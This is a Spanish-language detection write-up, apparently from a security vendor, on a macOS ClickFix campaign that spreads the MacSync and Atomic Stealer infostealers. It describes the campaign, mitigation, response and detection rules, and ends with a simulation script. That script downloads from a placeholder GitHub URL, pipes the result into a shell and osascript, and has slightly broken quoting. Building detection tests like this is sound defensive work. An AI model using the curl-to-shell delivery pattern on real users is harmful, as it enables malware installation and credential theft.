La campaña ClickFix de macOS evoluciona con puertas de infección camufladas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Una campaña de macOS ClickFix está distribuyendo infostealers, incluyendo MacSync y Atomic Stealer (AMOS), a través de una puerta de huellas digitales del lado del servidor sofisticada. La operación utiliza dominios generados algorítmicamente y técnicas de huellas digitales de navegadores para asegurar que las cargas maliciosas solo se entreguen a usuarios genuinos de macOS, ayudando a evadir análisis de seguridad automatizados y rastreadores. Esta evolución marca un cambio de ingeniería social amplia hacia técnicas de entrega altamente dirigidas y ocultas.
Investigación
Microsoft Threat Intelligence rastreó un clúster de más de 250 dominios que compartían un patrón de nombres distintivo para descubrir la campaña. La investigación reveló una transición de entrega directa de señuelos a un proceso de dos etapas que involucra perfilado ligero de JavaScript. Al evaluar señales de WebGL, compensaciones de zona horaria y controles anti-análisis, los investigadores determinaron cómo la infraestructura dirige selectivamente a entornos macOS mientras presenta contenido señuelo benigno a solicitudes no calificadas.
Mitigación
Las organizaciones deben educar a los usuarios de que las actualizaciones legítimas de software no requieren pegar comandos en Terminal. Los equipos de seguridad deben monitorear actividad sospechosa en Terminal que incluya utilidades como curl, base64, gunzip, o osascript, particularmente cuando se activan después de navegar por la web. Fortalecer las protecciones en torno a los datos de Keychain y monitorear la archivación no autorizada de archivos sensibles también puede reducir el impacto de un compromiso exitoso.
Respuesta
Si se detecta ejecución sospechosa en Terminal o acceso no autorizado a almacenes de credenciales, los respondedores deben aislar inmediatamente el endpoint de macOS afectado. Investigue las conexiones salientes a dominios de baja reputación, con especial atención a /curl/ patrones de solicitud. Los hosts de preparación maliciosos identificados deben ser bloqueados, y el historial reciente de shell debe ser revisado en busca de ejecución de comandos codificados u ofuscados.
Flujo de Ataque
Detecciones
Intento de Ejecución de Curl Sospechoso [MacOS] (vía línea de comandos)
Proof of Value
Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)
Proof of Value
Posible Manipulación de Cadenas Codificadas en Base64 [MacOS] (vía línea de comandos)
Proof of Value
Detectar Conexiones Salientes hacia Dominios Sospechosos y Geografía/Navegadores Inesperados [Firewall]
Proof of Value
Ejecución de Comando Malicioso en Terminal de macOS a través de la Campaña ClickFix [Creación de Proceso Linux]
Proof of Value
Ejecución de Simulación
Prerequisito: El Chequeo de Telemetría y Línea Base Pre-vuelo debe haber sido aprobado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y buscar generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa de Ataque y Comandos: El adversario inicia una campaña de ClickFix presentando un mensaje de error falso en un navegador web, instruyendo al usuario a «Arreglar el error» pegando un comando específico en el Terminal. El objetivo del atacante es establecer persistencia o descargar malware. El comando utiliza
curlpara extraer una carga útil maliciosa de AppleScript desde un servidor remoto y lo redirige aosascript -epara ejecutarlo inmediatamente en memoria, eludiendo el escaneo basado en archivos tradicional. -
Script de Prueba de Regresión:
# Simulación de ClickFix: Obtención de una carga útil y ejecución a través de osascript # Nota: Usamos un comando de eco benigno para simular la carga útil remota para evitar la infección real. curl -s https://raw.githubusercontent.com/example/payload/main/script.sh | zsh -c 'osascript -e "display dialog "Alerta de Seguridad: Se requiere actualización del sistema""' # Para asegurarnos de que la regla de detección se active, ejecutamos el patrón exacto: osascript -e 'say "Este es un ataque simulado"' -
Comandos de Limpieza:
# No se escriben archivos en el disco en esta ejecución específica de línea de comandos, # pero nos aseguramos de que cualquier proceso en segundo plano sea terminado. killall osascript || true